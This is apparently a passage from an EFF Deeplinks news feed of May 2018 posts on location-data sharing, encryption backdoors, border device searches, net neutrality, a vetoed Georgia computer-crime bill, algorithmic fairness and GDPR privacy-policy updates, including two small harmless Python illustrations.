Data Wireless telecommunications carriers are obligated by law to keep call location information so they can provide it to first responders, or to the legal guardian or closest family member, in an emergency involving the risk of death or serious physical harm. But the same law also requires that every telco must protect the confidentiality of this information from unauthorized disclosure. FCC regulations expressly restrict telcos from sharing location information except where required by law, while providing the service for which the customer information was obtained, or with the express approval of the customer. The “big four” carriers of cellular wireless services, Verizon, AT&T, T-Mobile and Sprint, partner with and share location data with third-party location data aggregators, like LocationSmart and 3CInteractive, so that they don’t have to organize and manage requests for location data themselves. For example, companies like banks may want to check a customer’s location to verify that customer’s identity when they try to open a new bank account and prevent fraud. 
Generally, a user would have to provide consent for this kind of disclosure directly to the telco before that information could be released to the bank. But telcos receive so many requests for location information from so many companies, that they contract this out to third-party location data aggregators, who then provide that information to the customers. Securus appears to be taking advantage of this third-party aggregator system. It buys access to real-time location information through these third-party location data aggregators, which have a commercial relationship with the major wireless carriers, and then shares that information with government agencies for a profit. Securus confirmed to Sen. Wyden’s office that its web portal enables surveillance of customers of every major U.S. wireless carrier. It also confirmed that, outside of a check box, it does not take any additional steps to verify that documents uploaded by law enforcement agencies provide proper judicial authorization for real-time location surveillance. Nor does Securus conduct any review of surveillance requests. That means it doesn’t matter what a Securus customer uploads to the web portal—it could be a cat video for all we know—they will still get access to the real-time location data of the target of their inquiry by checking the box—without any consequences or accountability for misuse. Cellphone Location Data Sharing Appears to Trigger FCC Notice Requirements Such unauthorized location data sharing would appear to trigger notice requirements promulgated by the FCC in a series of rules governing access to Customer Proprietary Network Information (“CPNI”); namely “that carriers should be required to notify a customer whenever a security breach results in that customer’s CPNI being disclosed to a third party without that customer’s authorization.” The FCC’s safeguard rules also require telco carriers to maintain records that track access to customer CPNI records. Specifically, 47 CFR § 64.2009(c) of the Commission’s rules requires carriers to “maintain a record of all instances where CPNI was disclosed or provided to third parties, or where third parties were allowed access to CPNI,” and to maintain such records for a period of at least one year. These records could provide an avenue for tracking whether a customer’s data was shared with a company like Securus. Data Sharing May Also Violate the Fourth Amendment This term, the Supreme Court is reviewing a case that will impact the legality of Securus’s practices. In United States v. Carpenter, the Court is considering whether the Fourth Amendment requires law enforcement to get a warrant to access cell phone location data. We filed an amicus brief in Carpenter and in another case, United States v. Rios, arguing location data is extremely sensitive and must be protected by a warrant supported by probable cause. We carry our cell phones everywhere, and the location data they generate can be used to create a precise and comprehensive record of our everyday movements, such as when we visit the doctor, attend a protest, take a trip, meet with friends, or return home. Law enforcement shouldn’t have unfettered access to this data, whether they get it from Securus or directly from the phone companies. The Supreme Court’s opinion in Carpenter is expected by the end of June this year. EFF applauds Sen. 
Wyden and his staff for raising concerns about Securus’ real-time location tracking tool and the potentially unlawful practices of phone carriers that share customer location data with commercial partners without verifying assertions of legal authorization or customer consent. The fact that Securus was able to provide this service in the first place shows that telcos do not properly control access to their customers’ private information. The FCC should find out what, if any, demonstration of lawful authority or customer consent each wireless telco carrier requires from their partners before they provide access to private, real-time customer location information and other CPNI, and it should implement sanctions to deter telcos from shirking their responsibility for ensuring customer privacy and security in the future. To learn more about the latest issues in cell phone tracking, visit our Cell Tracking page.
>> mehr lesen

The Secure Data Act Would Stop Backdoors (Fr, 11 Mai 2018)
A new bill introduced in Congress gets encryption right. The bipartisan Secure Data Act would stop any government agency or court order from forcing a company to build backdoors into encrypted devices and communications. This welcome piece of legislation reflects much of what the community of encryption researchers, scientists, developers, and advocates have explained for decades—there is no such thing as a secure backdoor. Just last week, EFF convened a panel of true experts on Capitol Hill to explain why government-mandated backdoors face insurmountable technical challenges and will weaken computer security for all. Given that the DOJ and FBI continue to rely on flawed theoretical approaches to key escrow in pushing for “responsible encryption,” we’re glad to see some Congress members are listening to the experts and taking this important step to protect anyone who uses an encrypted device or service. EFF supports the Secure Data Act, introduced by Representatives Zoe Lofgren (D-CA), Thomas Massie (R-KY), Ted Poe (R-TX), Jerry Nadler (D-NY), Ted Lieu (D-CA), and Matt Gaetz (R-FL). You can read the full bill here. The two-page bill has sweeping safeguards that uphold security both for developers and users. As the bill says, “no agency may mandate or request that a manufacturer, developer, or seller of covered products design or alter the security functions in its product or service to allow the surveillance of any user of such product or service, or to allow the physical search of such product, by any agency.” This bill would protect companies that make encrypted mobile phones, tablets, desktop and laptop computers, as well as developers of popular software for sending end-to-end encrypted messages, including Signal and WhatsApp, from being forced to alter their products in a way that would weaken the encryption. The bill also forbids the government from seeking a court order that would mandate such alterations. The lone exception is for wiretapping standards required under the 1994 Communications Assistance for Law Enforcement Act (CALEA), which itself specifically permits providers to offer end-to-end encryption of their services. The Secure Data Act is thus the polar opposite of the Burr-Feinstein proposal introduced in the wake of the confrontation between Apple and the FBI in the San Bernardino case, which would have allowed sweeping court orders to require technical assistance from companies like Apple. We’ve explained before that this type of mandate is unconstitutional, likely violating the First Amendment. And, as an internal DOJ report recently demonstrated, the FBI did not need Apple’s assistance in the San Bernardino case because it had the resources at its disposal to unlock the iPhone belonging to the shooter. Nevertheless, the Bureau did not make its capabilities known to courts, Congress, and the public. Legislation like the Secure Data Act would both prevent another such fight from playing out and also head off the risk of wrong-headed legislation like the Burr-Feinstein proposal. EFF thanks the sponsors and co-sponsors of the Secure Data Act: Reps. Lofgren, Massie, Poe, Nadler, Lieu, and Gaetz.   Related Cases:  Apple Challenges FBI: All Writs Act Order (CA)
>> mehr lesen

Hearing Monday: EFF Asks Appeals Court To Rule Copyright Can't Be Used To Control the Public's Access to Our Laws (Fr, 11 Mai 2018)
Industry Groups' Lawsuit Threatens Public.Resource.org's Online Archives of Laws Washington, D.C.-On Monday, May 14, at 9:30 am, EFF Legal Director Corynne McSherry will argue in court that the public has a right to access, copy, and share the law—and industry groups that helped develop certain legal rules can't inhibit that right by claiming ownership in those rules. EFF represents Public.Resource.org, a website by a nonprofit organization that works to improve public access to government documents, including our laws. To fulfill that mission, it acquires and posts online a wide variety of public documents, including regulations that are initially created through private standards organizations but later incorporated into mandatory federal and state law. Public.Resource.org was sued by six huge private industry groups that work on fire, safety, energy efficiency, and educational testing standards. The industry groups claim copyright over parts of laws—published online by Public.Resource.org—that began as private standards, and they claim they can decide who can access and copy that law, and on what terms. McSherry will urge the U.S. Court of Appeals for the D.C. Circuit to overturn a lower court ruling that threatens to shut down Public.Resource.org's online archive of laws. Private organizations must not be allowed to abuse copyright to control who can read and speak the law, or where and how laws can be accessed. What: Hearing in ASTM v. Public.Resource.org When: Monday, May 14, 9:30 am Where: U.S. Court of Appeals for the D.C. Circuit E. Barrett Prettyman U.S. Courthouse Courtroom 31 333 Constitution Ave., NW Washington, DC 20001 For more information on this case: https://www.eff.org/cases/publicresource-freeingthelaw Contact:  Corynne McSherry Legal Director corynne@eff.org Mitch Stoltz Senior Staff Attorney mitch@eff.org
>> mehr lesen

FanFlick Editor: an entry in the Catalog of Missing Devices from an EFF supporter (Do, 10 Mai 2018)
You wonderful EFF supporters keep on coming up with great new entries to our Catalog of Missing Devices, which lists fictional devices that should exist, but don't, because to achieve their legal, legitimate goals, the manufacturer would have to break some Digital Rights Management and risk retaliation under Section 1201 of the Digital Millennium Copyright Act. Now, EFF supporter Rico Robbins has sent us the "FanFlick Editor," a welcome addition to the Catalog, alongside Dustin Rodriguez's excellent list of missing devices like the Software Scalpel and MovieMoxie; and Benjamin MacLean's Mashup Maker. If you have your own great ideas for additions, send them to me and maybe you'll see them here on Deeplinks! Meet the FanFlick Editor. With this revolutionary video editor, you can directly rip your favorite movies from DVDs or Blu-rays or even digital copies from iTunes, Google Play, and any other service. Edit the film to your heart's content and then distribute the edit decision list (EDL) -- a file that contains instructions that other people can use to edit their own copies during playback while they watch, so they can experience your vision for the movies you both love (or even the ones you hate!). Used your own footage, graphics, or audio? No problem! FanFlick Editor keeps track of what you made and what you ripped, and packages up your other content with your FanFlick EDL. That way, you only distribute material whose copyright you control, or that is in the public domain, or that fair use permits. Sharing edit decision lists is fair use and thus legal -- that's how ClearPlay does business -- so we're free to provide you with a useful, flexible tool like FanFlick Editor.
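To give a flavor of what such an edit decision list might contain, here is a toy Python sketch. The field names, file names, and JSON layout are all hypothetical, since FanFlick Editor does not exist; the point is simply that the shared file carries timestamps, actions, and pointers to your own added material rather than anyone else's footage.

```python
# A toy illustration of what a FanFlick-style edit decision list might contain.
# The format, field names, and file names are hypothetical (this is a missing
# device, after all); the file holds only timestamps, actions, and references
# to your own material, never the studio's footage.
import json

edl = [
    {"start": 0.0,   "end": 412.5,  "action": "keep"},
    {"start": 412.5, "end": 431.0,  "action": "skip"},   # cut a scene you dislike
    {"start": 431.0, "end": 5400.0, "action": "keep",
     "overlay_audio": "my_commentary.ogg"},              # your own audio, shipped alongside
]

def segments_to_play(entries):
    """Return the (start, end) ranges a compatible player would actually show."""
    return [(e["start"], e["end"]) for e in entries if e["action"] == "keep"]

with open("my_fan_edit.edl.json", "w") as f:
    json.dump(edl, f, indent=2)  # this small instruction file is all you would share

print(segments_to_play(edl))     # [(0.0, 412.5), (431.0, 5400.0)]
```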
>> mehr lesen

EFF and ACLU Can Proceed With Legal Challenge Against Warrantless Searches of Travelers' Smartphones, Laptops (Do, 10 Mai 2018)
Court Rejects DHS's Attempt to Have Case Dismissed Boston, Massachusetts—The Electronic Frontier Foundation (EFF), the American Civil Liberties Union (ACLU), and the ACLU of Massachusetts won a court ruling today allowing their groundbreaking lawsuit challenging unconstitutional searches of electronic devices at the U.S. border to proceed—a victory for the digital rights of all international travelers. EFF and ACLU represent 11 travelers—10 U.S. citizens and one lawful permanent resident—whose smartphones and laptops were searched without warrants at the U.S. border. The case, Alasaad v. Nielsen—filed in September against the Department of Homeland Security—asks the court to rule that the government must have a warrant based on probable cause before conducting searches of electronic devices, which contain highly detailed personal information about people’s lives. The case also argues that the government must have probable cause to confiscate a traveler’s device. A federal judge in Boston today rejected DHS’s request to throw the case out, including the argument that dismissal was justified because the plaintiffs couldn’t show they faced substantial risk of having their devices searched again. Four plaintiffs already have had their devices searched multiple times. "This is a big win for the digital rights of all international travelers," said EFF Staff Attorney Sophia Cope. "The court has rejected the government's motion to dismiss all claims in the case, so EFF and ACLU can move ahead to prove that our plaintiffs’ Fourth and First Amendment rights were violated when their devices were seized and searched without a warrant.” “The court has rightly recognized the severity of the privacy violations that travelers face when the government conducts suspicionless border searches of electronics,” said ACLU attorney Esha Bhandari, who argued the case last month. “We look forward to arguing this case on the merits and showing that these searches are unconstitutional.” Immigration and Customs Enforcement (ICE) policy allows border agents to search and confiscate anyone’s device for any reason or for no reason at all. Customs and Border Protection (CBP) policy allows border device searches without a warrant or probable cause, and usually without even reasonable suspicion. Last year, CBP conducted more than 30,000 border device searches, more than triple the number just two years earlier. For the ruling: https://www.eff.org/document/alasaad-v-nielsen-order-denying-defendants-motion-dismiss For more on this case: https://www.eff.org/cases/alasaad-v-duke Below is a full list of the plaintiffs along with links to their individual stories, which are also collected here: Ghassan and Nadia Alasaad are a married couple who live in Massachusetts, where he is a limousine driver and she is a nursing student. Suhaib Allababidi, who lives in Texas, owns and operates a business that sells security technology, including to federal government clients. Sidd Bikkannavar is an optical engineer for NASA’s Jet Propulsion Laboratory in California. Jeremy Dupin is a journalist living in Massachusetts. Aaron Gach is an artist living in California. Isma’il Kushkush is a journalist living in Virginia. Diane Maye is a college professor and former captain in the U.S. Air Force living in Florida. Zainab Merchant, from Florida, is a writer and a graduate student in international security and journalism at Harvard. Akram Shibly is a filmmaker living in New York. 
Matthew Wright is a computer programmer in Colorado. For the court ruling: https://www.eff.org/document/alasaad-v-nielsen-order-denying-defendants-motion-dismiss For more on border searches: https://www.eff.org/wp/digital-privacy-us-border-2017 For more ACLU information on this case: https://www.aclu.org/news/aclu-eff-sue-over-warrantless-phone-and-laptop-searches-us-border   Contact:  Adam Schwartz Senior Staff Attorney adam@eff.org Sophia Cope Staff Attorney sophia@eff.org
>> mehr lesen

Fourth Circuit Rules That Suspicionless Forensic Searches of Electronic Devices at the Border Are Unconstitutional (Do, 10 Mai 2018)
In a victory for privacy rights at the border, the U.S. Court of Appeals for the Fourth Circuit today ruled that forensic searches of electronic devices carried out by border agents without any suspicion that the traveler has committed a crime violate the U.S. Constitution. The ruling in U.S. v. Kolsuz is the first federal appellate case after the Supreme Court’s seminal decision in Riley v. California (2014) to hold that certain border device searches require individualized suspicion that the traveler is involved in criminal wrongdoing. Two other federal appellate opinions this year—from the Fifth Circuit and Eleventh Circuit—included strong analyses by judges who similarly questioned suspicionless border device searches. EFF filed an amicus brief in Kolsuz arguing that the Supreme Court’s decision in Riley supports the conclusion that border agents need a probable cause warrant before searching electronic devices—whether manually or with forensic software—because of the unprecedented and significant privacy interests travelers have in their digital data. In Riley, a case that involved manual searches, the Supreme Court followed similar reasoning and held that police must obtain a warrant to search the cell phone of an arrestee. As Hamza Kolsuz prepared to board a flight to Turkey at Washington Dulles International Airport, border agents searched his luggage and found that he was attempting to export firearms parts without a U.S. license. Border agents then confiscated his iPhone and manually searched it. They subsequently arrested Kolsuz and conducted a second search of his iPhone, this time using a forensic tool by the company Cellebrite. This forensic search produced “an 896-page report that included Kolsuz’s personal contact lists, emails, messenger conversations, photographs, videos, calendar, web browsing history, and call logs, along with a history of Kolsuz’s physical location down to precise GPS coordinates,” according to the court’s opinion. The Fourth Circuit’s ruling applies only to forensic, not manual, searches of electronic devices at the border because Kolsuz only challenged the use of the evidence obtained from the forensic search of his cell phone in his prosecution. “We have no occasion here to consider whether Riley calls into question the permissibility of suspicionless manual searches of digital devices at the border,” the court said. While we're heartened that the Fourth Circuit left open the possibility that manual searches may also require individualized suspicion, we disagree with the court’s unsupported statement that “the distinction between manual and forensic searches is a perfectly manageable one,” given that manual searches of electronic devices enable government agents to access virtually the same personal information as forensic searches. EFF has long argued that border agents need a warrant from a judge, based on probable cause of criminality, to conduct electronic device searches of any kind. The Supreme Court’s pre-Riley case law, however, permits warrantless and suspicionless “routine” searches of items like luggage that travelers carry across the border, a rule known as the border search exception to the Fourth Amendment’s warrant requirement. Based on these pre-Riley cases, the government claims it has the power to search and confiscate travelers’ cell phones, tablets, and laptops at airports and border crossings for no reason or any reason, and without judicial oversight. 
The Kolsuz court recognized the unique privacy interests that travelers have in their digital data and thus held, “particularly in light of the Supreme Court’s decision in Riley,” that forensic border device searches are “non-routine” searches that require “some form of individualized suspicion.” The Fourth Circuit quoted Supreme Court precedent and concluded that forensic border device searches are “highly intrusive” searches that infringe the “dignity and privacy interests” of individuals. The court noted, “The key to Riley’s reasoning is its express refusal to treat [cell] phones as just another form of container….” Importantly, the Fourth Circuit also left open the possibility that forensic border device searches may require the highest standard of individualized suspicion under the Fourth Amendment: “What precisely that standard should be—whether reasonable suspicion is enough… or whether there must be a warrant based on probable cause… is a question we need not resolve.” Unfortunately for Kolsuz, the Fourth Circuit did not suppress the 896-page report that resulted from the warrantless forensic search of his cell phone. The court held that the border agents reasonably relied upon existing case law “allowing warrantless border searches of digital devices that are based on at least reasonable suspicion,” and that the firearms parts that were found in his luggage supported reasonable suspicion that his cell phone contained evidence that Kolsuz was involved in “ongoing efforts to export contraband illegally.” While we would have liked to see the Fourth Circuit go further by expressly requiring a warrant for all border device searches, we’re optimistic that we can win such a ruling in our civil case with ACLU against the U.S. Department of Homeland Security, Alasaad v. Nielsen, challenging warrantless border searches of electronic devices.
>> mehr lesen

Red Alert for Net Neutrality: Tell Congress to Save the Open Internet Order (Mi, 09 Mai 2018)
In December, the FCC voted to end the 2015 Open Internet Order, which prevented Internet service providers (ISPs) like AT&T and Comcast from violating net neutrality principles. A simple majority vote in Congress can keep the FCC’s decision from going into effect. From now until the Senate votes, EFF, along with a coalition of organizations, companies, and websites, is on red alert and calling on you to tell Congress to vote to restore the Open Internet Order. The Congressional Review Act (CRA) allows Congress to overturn an agency rule using a simple majority vote. It likewise only requires 30 signatures in order to force a vote. The petition to force the vote was delivered today. That means we’re likely to see the Senate—which has been only one vote away from restoring net neutrality protections for quite a while—vote in mid-May. That gives us time to make sure our voices are heard. You can see where your representatives stand and then give them a call. Tell them to use the CRA to restore net neutrality protections. Take Action Save the net neutrality rules
>> mehr lesen

Catalog of Missing Devices: Arielle (Mi, 09 Mai 2018)
Today's world of amazing technology owes its existence to the low cost of entry: anyone can make anything and bring it to the world to see if it catches on. From emoji to email, the web to Netflix, the permissionless technology world lets us turn today's improbable idea into tomorrow's billion-dollar business. So yeah: adaptive, automated soundtracks for your ebooks, mining your music library for exactly the right track to play to enhance the mood of the fiction you're reading, scene by scene and song by song. All it takes is the right idea, and the right to get around the DRM on those ebooks.
>> mehr lesen

Victory! Georgia Governor Vetoes Short-Sighted Computer Crime Bill (Di, 08 Mai 2018)
Recognizing the concerns of Georgia’s cybersecurity sector, Gov. Nathan Deal has vetoed a bill that would have threatened independent research and empowered dangerous “hack back” measures. S.B. 315 would have created the new crime of “unauthorized access” without any requirement that the defendant have fraudulent intent. This could have given prosecutors the discretion to target independent security researchers who uncover security vulnerabilities, even when they have no criminal motives and intend to disclose the problems ethically. The bill also included a dangerous exemption for “active defense measures.” “After careful review and consideration of this legislation, including feedback from other stakeholders, I have concluded more discussion is required before enacting this cybersecurity legislation,” Gov. Deal wrote in his veto message. He added: Under the proposed legislation, it would be a crime to intentionally access a computer or computer network with knowledge that such access is without authority.  However, certain components of the legislation have led to concerns regarding national security implications and other potential ramifications.  Consequently, while intending to protect against online breaches and hacks, SB 315 may inadvertently hinder the ability of government and private industries to do so. With EFF’s support, Electronic Frontiers Georgia, a member of the Electronic Frontier Alliance, mobilized at every stage of the legislative process. They met with members of the state senate and house, “worked the rope” (a term for waiting outside the legislative chambers for lawmakers to emerge), held up literal “red cards” during hearings, and hosted a live stream panel. Nearly 200 Georgia residents emailed the governor demanding a veto, while 55 computer professionals from around the country submitted a joint letter of opposition.  Professors organized at Georgia Tech to call upon the governor to veto the bill.  EFF congratulates EF Georgia and its crew of dedicated advocates for their hard work defeating S.B. 315. We also thank Gov. Deal for doing right by Georgia’s booming cybersecurity industry—and users everywhere—by vetoing this bill.  
>> mehr lesen

Math Can’t Solve Everything: Questions We Need To Be Asking Before Deciding an Algorithm is the Answer (Mo, 07 Mai 2018)
Across the globe, algorithms are quietly but increasingly being relied upon to make important decisions that impact our lives. This includes determining the number of hours of in-home medical care patients will receive, whether a child is so at risk that child protective services should investigate, if a teacher adds value to a classroom or should be fired, and whether or not someone should continue receiving welfare benefits.  The use of algorithmic decision-making is typically well-intentioned, but it can result in serious unintended consequences. In the hype of trying to figure out if and how they can use an algorithm, organizations often skip over one of the most important questions: will the introduction of the algorithm reduce or reinforce inequity in the system? There are various factors that impact the analysis. Here are a few that all organizations need to consider to determine if implementing a system based on algorithmic decision-making is an appropriate and ethical solution to their problem: Will this algorithm influence—or serve as the basis of—decisions with the potential to negatively impact people’s lives? Before implementing a decision-making system that relies on an algorithm, an organization must assess the potential for the algorithm to impact people’s lives. This requires taking a close look at who the system could impact and what that would look like, and identifying the inequalities that already exist in the current system—all before ever automating anything. We should be using algorithms to improve human life and well-being, not to cause harm. Yet, as a result of bad proxies, bias built into the system, decision makers who don’t understand statistics and who overly trust machines, and many other challenges, algorithms will never give us “perfect” results. And given the inherent risk of inequitable outcomes, the greater the potential for a negative impact on people’s lives, the less appropriate it is to ask an algorithm to make that decision—especially without implementing sufficient safeguards.  In Indiana, for example, after an algorithm categorized incomplete welfare paperwork as “failure to cooperate,” one million people were denied access to food stamps, health care, and cash benefits over the course of three years. Among them was Omega Young, who died on March 1, 2009 after she was unable to afford her medication; the day after she died, she won her wrongful termination appeal and all of her benefits were restored. Indiana’s system had woefully inadequate safeguards and appeals processes, but the stakes of deciding whether someone should continue receiving Medicaid benefits will always be incredibly high—so high as to question whether an algorithm alone should ever be the answer.  Virginia Eubanks discusses the failed Indiana system in Automating Inequality, her book about how technology affects civil and human rights and economic equity. Eubanks explains that algorithms can provide “emotional distance” from difficult societal problems by allowing machines to make difficult policy decisions for us—so we don’t have to. But some decisions cannot, and should not, be delegated to machines. We must not use algorithms to avoid making difficult policy decisions or to shirk our responsibility to care for one another. In those contexts, an algorithm is not the answer. Math alone cannot solve deeply-rooted societal problems, and attempting to rely on it will only reinforce inequalities that already exist in the system. 
Can the available data actually lead to a good outcome? Algorithms rely on input data—and they need the right data in order to function as intended. Before implementing a decision-making system that relies on an algorithm, organizations need to drill down on the problem they are trying to solve and do some honest soul-searching about whether they have the data needed to address it. Take, for example, the department of Children, Youth and Families (CYF) in Allegheny County, Pennsylvania, which has implemented an algorithm to assign children “threat scores” for each incident of potential child abuse reported to the agency and help case workers decide which reports to investigate—another case discussed in Eubanks’ book. The algorithm’s goal is a common one: to help a social services agency most effectively use limited resources to help the community they serve. To achieve their goal, the county sought to predict which children are likely to become victims of abuse, i.e., the “outcome variable.” But the county didn’t have enough data concerning child-maltreatment-related fatalities or near fatalities to create a statistically meaningful model, so it used two variables that it had a lot of data on—community re-referrals to the CYF hotline and placement in foster care within two years—as proxies for child mistreatment. That means the county’s algorithm predicts a child’s likelihood of re-referral and of placement in foster care, and uses those predictions to assign the child a maltreatment “threat score.” The problem? These proxy variables are not good proxies for child abuse. For one, they are subjective. As Eubanks explains, the re-referral proxy includes a hidden bias: “anonymous reporters and mandated reporters report black and biracial families for abuse and neglect three and a half times more often than they report white families”—and some of those reports come from angry neighbors, landlords, or family members making intentionally false claims as punishment or retribution. As she wrote in Automating Inequality, “Predictive modeling requires clear, unambiguous measures with lots of associated data in order to function accurately.” Those measures weren’t available in Allegheny County, yet CYF pushed ahead and implemented an algorithm anyway.  The result? An algorithm with limited accuracy. As Eubanks reports, in 2016, a year with 15,139 reports of abuse, the algorithm would have made 3,633 incorrect predictions. This equates to the unwarranted intrusion into and surveillance of the lives of thousands of poor, minority families. Is the algorithm fair? The lack of sufficient data may also render the application of an algorithm inherently unfair. Allegheny County, for example, didn’t have data on all of its families; its data had been collected only from families using public resources—i.e., low-income families. This resulted in an algorithm that targeted low-income families for scrutiny, and that potentially created feedback loops, making it difficult for families swept up into the system to ever completely escape the monitoring and surveillance it entails. This outcome offends basic notions of what it means to be fair.  It certainly must not feel fair to Allegheny County families adversely impacted. There are many measures of algorithmic fairness. Does the algorithm treat like groups similarly, or disparately? Is the system optimizing for fairness, for public safety, for equal treatment, or for the most efficient allocation of resources? 
Was there an opportunity for the community that will be impacted to participate in and influence decisions about how the algorithm would be designed, implemented, and used, including decisions about how fairness would be measured? Is there an opportunity for those adversely impacted to seek meaningful and expeditious review, before the algorithm has caused any undue harm? Organizations should be transparent about the standard of fairness employed, and should engage the various stakeholders—including (and most importantly) the community that will be directly impacted—in the decision about what fairness measure to apply. If the algorithm doesn’t pass muster, it should not be the answer. And in cases where a system based on algorithmic decision-making is implemented, there should be a continuous review process to evaluate the outcomes and correct any disparate impacts. How will the results (really) be used by humans? Another variable organizations must consider is how the results will be used by humans. In Allegheny County, despite the fact that the algorithm’s “threat score” was supposed to serve as one of many factors for caseworkers to consider before deciding which families to investigate, Eubanks observed that “in practice, the algorithm seems to be training the intake workers.” Caseworker judgment had, historically, helped counteract the hidden bias within the referrals. When the algorithm came along and caseworkers started substituting their own judgment with that of the algorithm, they effectively relinquished their gatekeeping role and the system became more class and race biased as a result. Algorithmic decision-making is often touted for its superiority over human instinct. The tendency to view machines as objective and inherently trustworthy—even though they are not—is referred to as “automation bias.” There are of course many cognitive biases at play whenever we try to make a decision; automation bias adds an additional layer of complexity. Knowing that we as humans harbor this bias (and many others), when the result of an algorithm is intended to serve as only one factor underlying a decision, an organization must take care to create systems and practices that control for automation bias. This includes engineering the algorithm to provide a narrative report rather than a numerical score, and making sure that human decision makers receive basic training both in statistics and on the potential limits and shortcomings of the specific algorithmic systems they will be interacting with.  And in some circumstances, the mere possibility that a decision maker will be biased toward the algorithm’s answer is enough to counsel against its use. This includes, for example, in the context of predicting recidivism rates for the purpose of determining prison sentences. In Wisconsin, a court upheld the use of the COMPAS algorithm to predict a defendant’s recidivism rate on the ground that, at the end of the day, the judge was the one making the decision. But knowing what we do about the human instinct to trust machines, it is naïve to think that the judge’s ‘inherent discretion’ was not unduly influenced by the algorithm. One study on the impact of algorithmic risk assessments on judges in Kentucky found that algorithms only impacted judges’ decision making for a short time, after which they returned to previous habits, but the impact may be different across various communities of judges, and adversely impacting even one person is a big deal given what’s at stake—lost liberty. 
Given the significance of sentencing decisions, and the serious issues with trying to predict recidivism in the first place (the system “essentially demonizes black offenders while simultaneously giving white criminals the benefit of the doubt”), use of algorithms in this context is inappropriate and unethical. Will people affected by these decisions have any influence over the system? Finally, algorithms should be built to serve the community that they will be impacting—and never solely to save time and resources at whatever cost. This requires that data scientists take into account the fears and concerns of the community impacted. But data scientists are often far removed from the communities in which their algorithms will be applied. As Cathy O’Neil, author of Weapons of Math Destruction, told Wired earlier this year, “We have a total disconnect between the people building the algorithms and the people who are actually affected by them.” Whenever this is the case, even the most well-intended system is doomed to have serious unintended side effects.  Any disconnect between the data scientists, the implementing organization, and the impacted community must be addressed before deploying an algorithmic system. O’Neil proposes that data scientists prepare an “ethical matrix” taking into account the concerns of the various stakeholders that may be impacted by the system, to help “lay out all of these competing implications, motivations and considerations and allows data scientists to consider the bigger impact of their designs.” The communities that will be impacted should also have the opportunity to evaluate, correct, and influence these systems. *** As the Guardian has noted, “Bad intentions are not needed to make bad AI.” The same goes for any system based on algorithmic decision-making. Even the most well-intentioned systems can cause significant harm, especially if an organization doesn’t take a step back and consider whether it is ethical and appropriate to use algorithmic decision-making in the first place. These questions are just starting points, and they won’t guarantee equitable results, but they are questions that all organizations should be asking themselves before implementing a decision-making system that relies on an algorithm.  
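For readers who want to see what one of the fairness measures discussed above can look like in code, here is a toy sketch that compares how often a hypothetical algorithm flags people in two groups and applies the rough "80 percent rule" screen for disparate impact. The data, group labels, and threshold are invented for illustration; passing this one check would not by itself make a system fair.

```python
# A toy sketch of one fairness check mentioned above: compare how often an
# algorithm flags people in different groups and compute a disparate-impact
# ratio. The data, group labels, and the 0.8 ("80 percent rule") threshold are
# invented for illustration; a real audit would be far more involved.
from collections import defaultdict

# (group, flagged_by_algorithm) pairs from a hypothetical audit sample
decisions = [
    ("group_a", True), ("group_a", False), ("group_a", True), ("group_a", False),
    ("group_b", True), ("group_b", True),  ("group_b", True), ("group_b", False),
]

totals, flagged = defaultdict(int), defaultdict(int)
for group, was_flagged in decisions:
    totals[group] += 1
    flagged[group] += was_flagged

rates = {g: flagged[g] / totals[g] for g in totals}
ratio = min(rates.values()) / max(rates.values())

print(rates)                                   # {'group_a': 0.5, 'group_b': 0.75}
print(f"disparate impact ratio: {ratio:.2f}")  # 0.67
if ratio < 0.8:
    print("warning: the algorithm flags one group far more often than the other")
```

In practice a check like this is only a starting point; the questions above about who defines fairness and who reviews the outcomes still have to be answered by people.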
>> mehr lesen

Why Am I Getting All These Terms of Service Update Emails? (Mo, 07 Mai 2018)
Anyone looking at their inbox in the last few months might think that the Internet companies have collectively returned from a term-of-service writers' retreat. Company after company seem to have simultaneously decided that your privacy is tremendously important to them, and collectively beg you to take a look at their updated terms of service and privacy policies. You might assume that this privacy rush is connected to the ongoing Cambridge Analytica scandal, and Mark Zuckerberg's recent face-off with Congress. It's certainly true that Facebook itself has been taking some voluntary steps to revamp its systems in direct response to pressure from politicians in the U.S. and abroad. But most of the companies that are sending you email right now are doing so because of their own, independent privacy spring-cleaning. And that's almost entirely due to Europe's General Data Protection Regulation (GDPR), which comes into force on May 25th. Most companies that have users in Europe are scrambling to update their privacy policies and terms of service to avoid breaking this new EU law. The GDPR strongly encourages clarity in "information addressed to the public" about privacy—making now an excellent time for companies to provide clearer and more detailed descriptions of what data they collect, and what use they put it to. Then again, those updates might be a little overdue. Companies were always supposed to do this under European law—and, for that matter, Californian law too, which since 2003 has required any service that collects your private information to spell out their data use in detail. But the additional penalties of the GDPR (with fines of up to 20 million euro, or 4% of global revenue) and increasing confidence of European data protection regulators have poked many international companies to finally pay closer attention to their legal obligations. The EU regulators are certainly paying attention to these email updates. A strongly-worded blog post this week by the EU's head enforcer, European Data Protection Supervisor (EDPS) Giovanni Buttarelli, warned the public and his fellow regulators to be "vigilant about attempts to game the system", adding that some of these new terms of service emails could be "travest[ies] of the spirit of the new regulation". What To Look For So what might you look for in these changes? What are the potential good points, and where might Buttarelli's travesties be hiding? First, it depends on where you're living. Companies aren't under a legal obligation to implement the GDPR's provisions for all their users. You may even be able to see those new geographical distinctions in their changed terms. People in Europe (not just EU citizens) must be protected under the new law, but it's an open question whether Americans or those outside both regions will get the same treatment. You should be able to tell the details of those differences from the new policies. (Or not: Facebook, for instance, is only showing its new, detailed legal justifications for its data collection to users in Europe, and hiding that page from other users.) Some of the changes may just involve refinements in terminology. What companies have to do to comply with the GDPR, for instance, greatly depends on whether they're "data controllers" or "data processors" – roughly speaking, whether they have the responsibility to manage your data, or whether they're just handling it on behalf of another party. 
You may well see some frantic games of pass-the-parcel in the next few weeks as different services attempt to minimize or share their compliance burden. You can spot that in how they describe who is the "data controller" in their terms. For instance, Etsy, whose users are both buyers and sellers, has changed its language to emphasize that sellers are independent data controllers of your data. Google, meanwhile, has provoked a furious response from Europe's media publishers, after it declared itself the controller for the data from the ads and trackers that publishers put on their own websites, but expected the publishers to be the ones responsible for obtaining consent to share this data. Some of the other changes have a more immediate, positive result, though. The GDPR is an embodiment of the data protection rights spelled out in the EU's Charter of Fundamental Rights, which states: Everyone has the right to the protection of personal data concerning him or her... Such data must be processed fairly for specified purposes and on the basis of the consent of the person concerned or some other legitimate basis laid down by law. Everyone has the right of access to data which has been collected concerning him or her, and the right to have it rectified. When it comes to changes in these terms, most of the work will be spelling out those "specified purposes" in more detail, as well as explaining why the company thinks it can legitimately process that data under the GDPR. But there may also be changes in your ability to look at the data itself, and change it. For instance, Twitter users can now peer at the full pile of data that the company has picked up on them from their tweets and from cross-referenced advertiser 